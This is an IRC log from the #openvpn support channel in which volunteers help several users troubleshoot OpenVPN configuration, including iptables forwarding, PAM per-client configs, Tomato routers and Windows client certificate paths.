07:03 -!- tyteen4a03 [~T4@n218250226180.netvigator.com] has quit [Read error: Connection reset by peer] 07:03 -!- master_of_master [~master_of@p57B5480E.dip.t-dialin.net] has quit [Ping timeout: 246 seconds] 07:04 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 244 seconds] 07:05 -!- master_of_master [~master_of@p57B547BB.dip.t-dialin.net] has joined #openvpn 07:05 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 07:10 -!- yuri__ [~cek@crius.pantheon.fused.net] has joined #openvpn 07:14 -!- kunago [~Thunderbi@201.239.broadband12.iol.cz] has joined #openvpn 07:16 < kunago> Hello guys. I need to consult some iptables guru who could give me a hint why I am unable to ping clients connected directly to my VPN while I am able to ping clients on other subnets. This picture might give an idea of what I am trying to do: http://s.kunago.com/2013-02-10_14-14-21.jpg 07:18 < kunago> I am not using "client-to-client" and am trying to fine tune the access for each client manually. I was able to propapage clients for clients on all subnets, this works fine with the FORWARD table of iptables but not with the VPN IP range. There I am unable to reach each client. 07:20 < kunago> iptables rules such as "iptables -A FORWARD -s 192.168.10.0/24 -d 192.168.10.0/24 -j ACCEPT" do not seem to make any difference. 07:20 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has joined #openvpn 07:21 -!- Orbi [~opera@109.129.3.216] has joined #openvpn 07:25 -!- Orbi [~opera@109.129.3.216] has quit [Read error: Connection reset by peer] 07:31 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 07:31 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving] 07:47 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in] 07:49 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 07:58 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 07:59 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 08:07 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"] 08:08 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has quit [Ping timeout: 248 seconds] 08:09 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 08:10 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has joined #openvpn 08:12 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has quit [Read error: Operation timed out] 08:16 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 08:19 -!- yuri__ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 256 seconds] 08:34 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:51 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 08:52 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 08:57 -!- LordDoskias [~chichiman@unaffiliated/lorddoskias] has joined #openvpn 08:57 < LordDoskias> hello, i have an openvpn set up to use PAM auth via username/password i was wondering whether openvpn supports per-client configuration when used in that mode? I know it supports it if i use client certificates but does it do it when used with PAM 08:58 < EugeneKay> --username-as-common-name should do what you want 09:02 -!- Ahti333 [~Ahti333@cronosx.de] has joined #openvpn 09:03 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 09:03 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 09:09 < LordDoskias> so i did what you recommended and here is my server.conf http://pastie.org/private/uzmnfhl5fij7kxfzr4cp2a 09:09 < LordDoskias> i created a 'ccd' dir under /etc/openvpn and in it created a file called 'goon' becuaase the user that is going to auth is called 'goon', but now my openvpn server doesn't want to start 09:10 < LordDoskias> this is my version of openvpn: Version: 2.2.1-3~bpo60+1 09:11 < rob0> are the logs in that paste? 09:11 < LordDoskias> nope i cannot seem to get the logs 09:12 < LordDoskias> because it is failing on start up 09:12 < rob0> I guess you should address that issue first. 09:12 < LordDoskias> how? 09:13 < LordDoskias> when i run openvpn --daemon --config server.conf nothing gets printedon the screen 09:14 < rob0> do you know what --daemon does? 09:14 < LordDoskias> runs it in background as a service 09:14 < rob0> ... and sends logs to ... 09:14 < LordDoskias> but even without it still doesn't print anything on the screen 09:18 < LordDoskias> where does it print its errors? 09:18 < LordDoskias> or any output for that matter 09:19 -!- b1rkh0ff [~b1rkh0ff@178.77.24.133] has joined #openvpn 09:19 < LordDoskias> during start up that is, because it is not in the file set in the server.conf 09:21 < LordDoskias> okay, found it :) 09:22 < LordDoskias> it says it is because auth-user-pass-verify is missing but i'm using the pam module 09:25 -!- xbanux [~xbanux@59.182.148.220] has joined #openvpn 09:26 < LordDoskias> isn't it a bit idiosincratic that username-as-common-name requires auth-user-pass-verify? shouldn't authenticating via pam module be supported as well? 09:27 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has quit [Quit: Leaving] 09:27 < EugeneKay> Typically the verify script handles figuring out PAM or w/e 09:38 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has joined #openvpn 09:39 -!- catsup [~d@64.111.123.163] has joined #openvpn 09:39 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Remote host closed the connection] 09:44 -!- xbanux [~xbanux@59.182.148.220] has quit [Ping timeout: 245 seconds] 09:46 < LordDoskias> if i have plugin /usr/lib/openvpn/openvpn-auth-pam.so login shouldn't username-as-common-name work as well 09:46 < LordDoskias> in this case openvpn starts and clients connect but the client-specific configuration is not executed 09:53 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 240 seconds] 09:55 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 09:57 -!- corretico [~luis@190.211.93.38] has joined #openvpn 09:57 -!- corretico [~luis@190.211.93.38] has quit [Remote host closed the connection] 09:57 -!- corretico [~luis@190.211.93.38] has joined #openvpn 09:59 -!- kunago [~Thunderbi@201.239.broadband12.iol.cz] has quit [Remote host closed the connection] 10:09 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has joined #openvpn 10:25 -!- xbanux [~xbanux@triband-mum-59.182.148.220.mtnl.net.in] has joined #openvpn 10:27 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has quit [Quit: leaving] 10:41 < LordDoskias> so i set up the authentication to work with the provided perl script, however, my client specific settings aren't pushed 10:53 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 10:53 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 11:03 < LordDoskias> so here is my server.log ccd/goon and log of when the client has connected: http://pastie.org/private/vvwlxw87cxfp9jvhjwwq 11:03 < LordDoskias> unfortunately it is not receiving the client-specific information specified in the file 11:03 < LordDoskias> the perms of the goon file is 755 so it can be read after openvpn drops root 11:10 -!- yavor [~yavor@78.128.23.17] has joined #openvpn 11:44 < pekster> LordDoskias: You may be able to get the same effect using a --client-connect script instead, and using the $username env-var 11:44 < pekster> See the section in the manpage called "SCRIPTING AND ENVIRONMENTAL VARIABLES" 11:45 < pekster> I don't know if that works, but it's worth exploring. You can also use 'set > /tmp/vars.dump' in a client-connect script to see what the envnironment does have for you to play with 11:49 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 245 seconds] 11:51 < LordDoskias> i fixed it 11:51 < LordDoskias> it rusn out that the path to the ccd dir has to be full and not relative 11:51 < pekster> Ah, k 11:52 < pekster> Running at 'verb 4' usually provides helpful clues like that 12:02 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 12:37 -!- xbanux [~xbanux@triband-mum-59.182.148.220.mtnl.net.in] has quit [Ping timeout: 248 seconds] 12:39 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 276 seconds] 12:41 -!- LordDoskias [~chichiman@unaffiliated/lorddoskias] has left #openvpn ["Leaving"] 12:43 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Connection reset by peer] 12:46 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 13:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:23 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 248 seconds] 13:25 < lickalott> all, i've generated all my keys but haven't been successful in getting the OpenVpn started. i've tried a different approach as a troubleshooting step but it's asking for a static key and i'm not sure which one to use. 13:27 < rob0> !goal 13:27 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 13:37 -!- bighornram [~bighornra@c-68-35-157-179.hsd1.nm.comcast.net] has joined #openvpn 13:41 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 13:41 -!- yuri__ [~cek@crius.pantheon.fused.net] has joined #openvpn 13:45 < lickalott> I would like to setup OpenVpn server on my tomato flashed router, but the configuration tut's that I'm following don't seem to work. I have been already told that I should ask in the tomato chan but they are worthless and non-responsive. I have been assisted here in the past but i was traveling down another path at that time. in an attempt to get this thing working I tried to follow another 13:45 < lickalott> tut that says set server > basic > authorization mode to static key, but I don't know which of my keys i need to throw in that box. 13:46 < rob0> A static key VPN is a peer-to-peer connection, no server nor client, just two peers only. Is that what you want? 13:47 < pekster> Didn't you have your server starting without errors yesterday? If you had problems at that point, looking that the logs on both sides should have been the next step if you were having problems 13:47 < rob0> "!goal" means just that, *clearly* state what you are trying to do here. 13:48 < lickalott> honestly I don't know. This whole thing escapes me... I have an ubuntu server running the -AS (which I was told isn't supported either) and that works fine. I'm just trying to set it up through the router. 13:48 < rob0> pekster seems to have some of the background here. so might better be able to help. 13:48 -!- bighornram [~bighornra@c-68-35-157-179.hsd1.nm.comcast.net] has quit [Ping timeout: 256 seconds] 13:48 < rob0> !as 13:48 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 13:49 < rob0> We do not use Access-Server here. 13:49 < lickalott> yes pekster it showed started but there was no traffic and I couldn't connect to it. i tried changing ports and messing with some other settings. 13:49 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 13:49 < pekster> Well, part of it. No idea exactly what tomato is doing under the hood since it hides all that behind web configs... 13:49 < lickalott> lickalott is ~lickalott@127.0.0.1.silentkiller.cc * Nun-ya 13:49 < lickalott> lickalott on #openvpn-as 13:50 < lickalott> the inteface seems to be pretty basic, i think it's just my lack of knowledge that's preventing it from working. 13:51 < pekster> As I believe I noted yesterday, the "basic" tomato interface then turns around and runs a bunch of fairly complicated shell code to "convert" the web settings stored on the router into a command to call openvpn. Here, we support openvpn, not the web config or shell scripts that make tomato go 13:51 < lickalott> lets say that I just jumped in and said "hey guys, whats the best setup/configuration of software and hardware to get openvpn working" What would you say? i.e. whats the ideal setup 13:51 < pekster> !howto 13:51 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 13:51 < pekster> ^that^ 13:52 < lickalott> you did pekster, and I'm trying to stay away from the tomato portion and just focus on the openvpn stuff. 13:52 -!- module000 [~module000@254.sub-70-196-34.myvzw.com] has joined #openvpn 13:52 < pekster> Tomato should be able to run the 'openvpn' command without any tomato web config or initsscripts at all. Of course, it won't auto-start on boot unless you design your own startup code, but that's often good for learning too, if you want to really understand how it all works 13:53 < rob0> Alice: Would you tell me, please, which way I ought to go from here? 13:53 < rob0> The Cat: That depends a good deal on where you want to get to 13:53 < pekster> :) 13:53 < lickalott> lol 13:54 < lickalott> i would like to take the ubuntu server out of the picture, in regard to openvpn and run it strictly from the router. <-- thats #1. #2 would be to have the server set up as the CA so i'm not generating keys on the router. however, I will settle for #1 right now. 13:55 < pekster> easy-rsa is completely separate from openvpn; you can run easy-rsa on whatever system you want 13:55 < pekster> Just keep doing the key/PKI tasks on the server and send keys/certs to the router 13:55 < rob0> The proper way to run a CA is for clients to generate their own keys and CSRs, then the CA signs them. 13:55 < pekster> Yes, except with embedded hardware that has really awful entropy 13:56 < lickalott> and that's already accomplished. I have all the crt and key files that I need. I will be the only person using the vpn 13:56 < EugeneKay> Eh, if you can get the keys to the clients securely(SSH, say), it's "OK" to generate the client.key at the CA. 13:56 < lickalott> WTF! I just hit start now to see if I could grab you guys some logs and it started. 13:56 < EugeneKay> But that's a philosophical difference. 13:57 < lickalott> only thing i changed was TAP vs TUN 13:57 < rob0> sure, it's "okay", but it's not proper. I don't want anyone else to have my keys. 13:58 < EugeneKay> That ends up depending upon how much separation of responsibiltiy you have :-p 13:59 < lickalott> pekster you said that the XML-RPC is a product of the AS right? 13:59 < rob0> So, one user of this VPN. Where will you be coming (connecting) from? Possibly a static key tunnel is good enough. And why tap? That's generally a bad idea. 14:00 < lickalott> mainly from work. TAP; I was just following this (http://blog.johnso.org/2009/08/how-to-setup-openvpn-in-tomato.html) to try and get it to work. 14:00 <@vpnHelper> Title: Hacks and Slash: How to Setup Openvpn in Tomato (at blog.johnso.org) 14:00 < pekster> lickalott: That error you had before was with the "Access Server" GUI. I've never used it before, but enough text was shown behind your error message to confirm that. That client will *not* connect to the open-source OpenVPN system. It's a completely different method to connect, requring you to run the commercial code everywhere 14:00 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 276 seconds] 14:01 < lickalott> installed this - openvpn-client (desktop).msi 14:01 < pekster> Nope, wrong thing 14:01 < pekster> !download 14:01 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 14:01 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 14:03 < rob0> Possibly your best bet is to focus on learning the quirks of your Tomato OS, and then you can use the regular OpenVPN howto and documentation. 14:03 < rob0> If you really do want to use AS, again, this is not the place for it. 14:04 < rob0> Decide which one you are going to try and go to only that channel. 14:04 < lickalott> idc if it's AS. I just want to be able to access my stuff while at work. 14:05 < pekster> the .msi is AS; the GPL code does not provide an msi installer 14:05 < rob0> Answers you get here will be for GPL openvpn ("community version".) They might not be correct for AS, and vice versa. 14:05 < rob0> so do that first: choose. 14:06 < lickalott> my choice is; listening to pekster and rob0 14:06 < lickalott> ;D 14:06 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 14:07 < lickalott> here's the honest truth... i don't know enough about this (even after reading) to make an informed decision on a topic like that. 14:07 < lickalott> my !goal = get it to work preferrably from the router and staying with my current setup as a backup measure. 14:07 < lickalott> installing http://swupdate.openvpn.org/community/releases/openvpn-install-2.3.0-I001-x86_64.exe 14:08 < lickalott> i remember issues with this yesterday. lemme run it up again and remember what the problem was. 14:08 < rob0> um, that looks like a Windows .exe 14:08 < lickalott> above all else, I appreciate you guys putting up with me. 14:08 < lickalott> yeah... i'm trying to get a suitable client GUI to test the connection. 14:09 < lickalott> is that not what I want? 14:09 * lickalott stops installing 14:09 < pekster> rob0: Ye,a that's the official installer 14:09 < pekster> lickalott: NO, that's completely correct 14:09 < pekster> s/O/o/ 14:09 < lickalott> kk 14:10 -!- module000 [~module000@254.sub-70-196-34.myvzw.com] has left #openvpn [] 14:11 < lickalott> either of you use usenet? 14:11 < pekster> That tomato-based guide you posted is, IMO, also full of as much fail as the first two you tried yesterday. You probably don't want tap, and you likely don't want a static keyed setup either since addressing has to be manually handled on the client 14:11 < lickalott> *may be able to trade goods for services.... 14:12 < pekster> I'll 2nd rob0's suggestion of learning openvpn based on the howto, and then learning how tomato expects you to use openvpn after you understand the basics. You're trying to do 2 things at once that you've never done before, and it's not helping you do either of them well 14:13 < lickalott> k. so focus on an entire setup (based off of the howto page) on the ubuntu rig first, then migrate over to the router once I've learned more? 14:13 < pekster> In fact, you can get your feet wet with openvpn on your existing server where you get a proper environment. Then, we you have the skills to set up a working openvpn server, port your config to tomato through its interface 14:13 < pekster> Yea, we basically just said the same thing :) 14:13 < lickalott> right...just clarifying 14:13 < lickalott> kk 14:14 < lickalott> i'll do that. 14:16 < lickalott> so, the usenet thing? yay or nay? 14:21 < rob0> I have not been on Usenet in many years. 14:22 < pekster> usenet : early 90's :: dev&user maillists : now 14:22 < pekster> As far as I'm concerened 14:22 < pekster> I'll leave the rest for pioneers of web evolution to figure out 14:26 < lickalott> there is a mass DMCA push right now, but i've found a server that doesn't play by the rules as well as a good nzb site to pull from. I was going to offer invites (when they hit) to you guys if you still/currently used it. 14:26 < lickalott> should've been a comma in there somewhere 14:26 < pekster> Not really on topic for here 14:26 < lickalott> btw: half way through the set up and there are already correlations being made... +1 for tough love 14:26 < lickalott> rog (topic) 14:27 < lickalott> rog = roger that 14:29 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 256 seconds] 14:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:59 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Remote host closed the connection] 15:04 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 15:04 < hg_5> hello, what is wrong i have openvpnserver, when other router is connected to it, all is fine, but when i will connect to it from my pc, router load cpu is about 96% ;o 15:06 < pekster> If you're pushing traffic, it doesn't sound like anything is wrong. Encryption costs CPU time, and many routers have relatively weak CPUs 15:20 < lickalott> pekster i'm trying to configure the client gui (client.ovpn). The keys on my server are owned by root and in a dir that isn't shared out by NFS or samba (and I think it needs to be that way). Do i grab the keys i've generated for client1 over to my windows machine or do i have to generate keys locally? 15:22 < pekster> You can either transfer the keys over (just have root copy them somewhere that your normal user can acccess, chown them to the user, and use scp, NFS, Samba, or whatever to copy them 15:22 < lickalott> k 15:22 < pekster> Optionally you can generate keypairs on your client, send the CSR to the CA, have the CA sign it, and return the signed certificate to the client; that's a bit more complex 15:23 < pekster> (moreso because easy-rsa under Windows doesn't yet support keypair generation apart from the CA's PKI) 15:36 -!- amir_ [~amir@unaffiliated/amir] has joined #openvpn 15:47 -!- Burgundy [~burgundy@5-12-190-68.residential.rdsnet.ro] has quit [Remote host closed the connection] 15:50 < lickalott> still stuck. 15:50 < lickalott> http://pastebin.com/CAz4Kw1R 15:50 < lickalott> thats the response I get when I try to initiate the service (client) and the portion of my .ovpn where I've called out the keys. 15:57 < lickalott> pekster, rob0 you see anything amiss with that ^^ 16:00 < pekster> Manpage has some hints for you just a couple pages down 16:04 < rob0> pekster, is it the need for double backslash? 16:07 < lickalott> added the [SPACE] and \\. no change. 16:09 < pekster> So yours looks like thte sample in the now? 16:09 < pekster> Where it says: For example on Windows, use double backslashes to represent pathnames: secret "c:\\OpenVPN\\secret.key" 16:10 < lickalott> true 16:10 < pekster> Spaces need no special handling besides quoting the entire path 16:11 < lickalott> http://pastebin.com/pubTBD77 16:11 < lickalott> oh... 16:11 < lickalott> cleaned up spaces. same 16:15 < pekster> And that means what exactly? 16:15 < lickalott> sry 16:16 < lickalott> took the [SPACE] out of all three entries and tried to initiate again. Same error appears 16:16 < pekster> So you have a folder called "ProgramFiles" in addition to the standard "Program Files" ? That's strange... 16:17 < lickalott> now I'm confused.... 16:17 < lickalott> [14:10] Spaces need no special handling besides quoting the entire path 16:17 < lickalott> ca "C:\\Program Files\\OpenVPN\\bin\\ca.crt" 16:17 < lickalott> is that not correct? 16:17 < pekster> That is. You said something different a moment ago 16:18 < pekster> Is it in that folder? openvpn\bin\ is a non-standard spot for the files as they usually go in config\ 16:18 < lickalott> i was referring to this - \[SPACE] Pass a literal space or tab character, don't 16:18 < lickalott> interpret it as a parameter delimiter. 16:18 < pekster> Only if you don't quote things 16:18 < pekster> See: 16:18 < pekster> !sample 16:18 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 16:18 < lickalott> yes they are in that folder. 16:18 < pekster> Oh, no, not that link 16:20 < lickalott> let me ask this... should the .ovpn file have an icon that links it to openvpn.exe? 16:20 < lickalott> right now it has no default program associated to it. 16:21 < lickalott> the reason I'm asking is; if I put the files into the config dir (which I did in the beginning) I have to type "openvpn.exe ../config/client.ovpn" 16:33 < pekster> The "icon" doesn't link anything, although that's besides the point. By default it'll open with notepad IIRC, although I thought newer versions had a context entry too 16:34 < lickalott> then i'm lost... idk where to go from here. 16:34 < lickalott> would the entire file help if I pastebin'd it? 16:34 < lickalott> well..let me ask this way. Would you be willing to peruse it if I posted it 16:35 < pekster> Remove comments and whitespace first please, and paste the error generated unless it is literally and completely identical to the one in your earlier output 16:36 < pekster> In fact, paste the error anyway, because it's citing a relative path in your last output 16:36 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 16:38 < lickalott> http://pastebin.com/SRThSDub 16:38 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 16:40 < lickalott> the only difference I see (based on the !sample link) is the user and group. But that shouldn't matter for initialization right? 16:41 < pekster> Your path is still relative 16:41 < pekster> That's not what the error should produce for that config file 16:42 < pekster> An absolute path produces something like this in error: Options error: --ca fails with 'D:\Apps\OpenVPN\config\auth-client\badca.crt': No such file or directory 16:44 < lickalott> relative as in relative vs absolute or relative as in that could still be an issue? 16:45 < pekster> relative path. Compare the error messages and it should be obvious 16:45 < pekster> Either your config has another "cert" and "key" entry that you didn't include in your paste, or you're referencing the wrong config file 16:47 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Read error: Operation timed out] 16:48 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Read error: Operation timed out] 16:48 -!- yuri__ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 276 seconds] 16:49 < lickalott> pekster http://tinypic.com/r/3586zwm/6 16:49 <@vpnHelper> Title: Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting (at tinypic.com) 16:49 < lickalott> shot of my dir 16:53 < lickalott> am I missing something obvious?? 16:53 < pekster> Apparently. I've told you that your path is invalid based on the configuration you're referencing 16:55 < lickalott> i don't understand how though. It's the absolute path to the files. ALL of the files that i'm working with are in that directory (for now) 16:55 < pekster> Apparently not 16:55 < pekster> "Options error: --cert fails with 'client.crt': No such file or directory" 16:55 < pekster> Where it says 'client.crt' is not a valid path 16:55 * lickalott faceplams 16:56 < lickalott> i need to take a break... that was a stupid oversight on my part. 16:57 * lickalott knows pekster is nodding "yep" 16:59 -!- yuri__ [~cek@crius.pantheon.fused.net] has joined #openvpn 17:03 -!- yuri__ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 256 seconds] 17:26 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 17:26 -!- raidz_away is now known as raidz 17:26 -!- raidz [~raidz@raidz.im] has quit [Changing host] 17:26 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 17:26 -!- mode/#openvpn [+o raidz] by ChanServ 17:29 -!- walp [~nobody@unaffiliated/walp] has quit [Quit: leaving] 17:33 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 17:33 -!- mode/#openvpn [+o mattock] by ChanServ 18:05 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds] 18:12 -!- storrgie [~storrgie@c-98-224-170-69.hsd1.mi.comcast.net] has joined #openvpn 18:13 < storrgie> I'm looking at some router devices.. some have hardware accel for encryption and some dont. With OpenVPN is this a _necessary_ thing for both the clients and the server... or is it essential for just the server? I could run the server on a VM someplace on a Xeon and just have the clients be Mikrotik routers. 18:15 < pekster> "Necessary" is relative to what your expectations are. Without usable hardware crypto, the in-software openssl functions are used to perform the actual crypto; since openvpn is single-threaded at present, that defines an upper-bound on how fast you can process crypto operations 18:16 < storrgie> but, I think what you're saying is that both ends are going to have equal 'heavy lifting' in this process 18:17 < pekster> Per-clienet, yes. A server supporting multiple clients has to do crypto for all of the clients' traffic, naturally 18:17 < storrgie> have you had any experience with mikrotik devices? 18:17 < pekster> Nope. I have done openvpn on an Asus WL-500gPv2 18:18 < storrgie> I cant figure out what processor is in that 18:19 < storrgie> oh, broadcom 240mhz 18:19 < storrgie> so... did you notice any slowdown by running it on this device? 18:19 < pekster> Compared to what, a PC? Sure, but I don't need to push 100Mbps or anything 18:20 < storrgie> yeah I'm trying to link sites that are 27mbps/7mbps 18:21 < pekster> My dev unit (the 500gPv2) may or may not be in a bootable state, but let me see if I can fire it up real quick for a "rough" test using a bulk transfer of some sort 18:21 < storrgie> I'm curious... can I use openvpn to link specific types of requests... say, the clients at site 1 go to the internet through site 1 modem... but when they make a request for server.site2 they go through the openVPN tunnel? 18:21 < storrgie> pekster, oh don't worry about doing any work for me 18:21 < pekster> Maybe not 27Mbps, but I used this same 500gPv2 unit to connect perma-remote employees last office gig I had, and they were good enough for email/bulk file transfers to the main office in another state 18:21 < storrgie> I'm just asking hypotheticals 18:21 < pekster> k 18:22 < pekster> You can do policy routing all you want, although it's up to you to set that up 18:22 < storrgie> but you can do policy routing... so that only requests to to specific site2 resources will actually go over the openvpn 18:22 < pekster> Yup 18:23 < pekster> You don't need policy routing for that even 18:23 < storrgie> that is excellent 18:23 < pekster> Just set routes for the destinations reachable across the tunnel 18:23 < storrgie> (I've never set it up before... just been wanting to do it) 18:23 < pekster> policy routing is when you need to handle routing decisions on more complex attributes, like source network or source VLAN/interface, etc 18:24 < pekster> Normal routing works as you'd expect with an extra "interface" as it were; openvpn makes it easy to exposes that to your clients: 18:24 < pekster> !route 18:24 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 18:24 < pekster> also: 18:24 < pekster> !serverlan 18:24 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 18:26 < storrgie> woof 18:26 < storrgie> setup of openvpn is quite an ordeal 18:26 < storrgie> I'm actually running it right now on a pfsense box 18:26 < storrgie> and I was quite perplexed about getting it configured 18:26 < pekster> If you haven't seen the official site/docs: 18:26 < pekster> !howto 18:26 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 18:27 < storrgie> Well I really appreciate you fielding my questions 18:27 < storrgie> I want to run mikrotik stuff because i like the price and the form factor 18:27 < storrgie> I'm used to pfsense 18:27 < storrgie> but I'm running it on a 1u supermicro at my house and its just insane loud 18:28 < storrgie> I would like to switch to a fanless or virtually silent device 18:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 19:20 -!- storrgie [~storrgie@c-98-224-170-69.hsd1.mi.comcast.net] has quit [Quit: Leaving] 19:53 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 20:02 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 276 seconds] 20:08 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Ping timeout: 252 seconds] 20:10 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 20:20 -!- qmr [~qmr@50.116.18.140] has joined #openvpn 20:20 < qmr> trying to set up a VPN server with static key howto .. openvpn start fails, how / where can I get debugging information? 20:24 < rob0> well, maybe this is nitpicky, but with static keys, there IS no server/client, just "peers". 20:24 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: Operation timed out] 20:24 < rob0> Try running it from the command line without your distro init script, and without --daemon 20:25 < rob0> comment out "daemon" if it is in your config 20:25 < rob0> !logs 20:25 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 20:25 < rob0> !logfile 20:25 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info 20:25 < qmr> ok, openvpn openvpn.conf gave some useful output 20:26 < qmr> Sun Feb 10 21:25:25 2013 Note: Cannot open TUN/TAP dev /dev/net/tun: No such file or directory (errno=2) 20:26 < rob0> "modprobe tun" 20:26 < rob0> it IS Linux, right? 20:26 < qmr> no such module ... 20:26 < qmr> http://www.youtube.com/watch?v=bW7Op86ox9g 20:26 <@vpnHelper> Title: DUN-DUN-DUUUUN!!! Sound Effect - 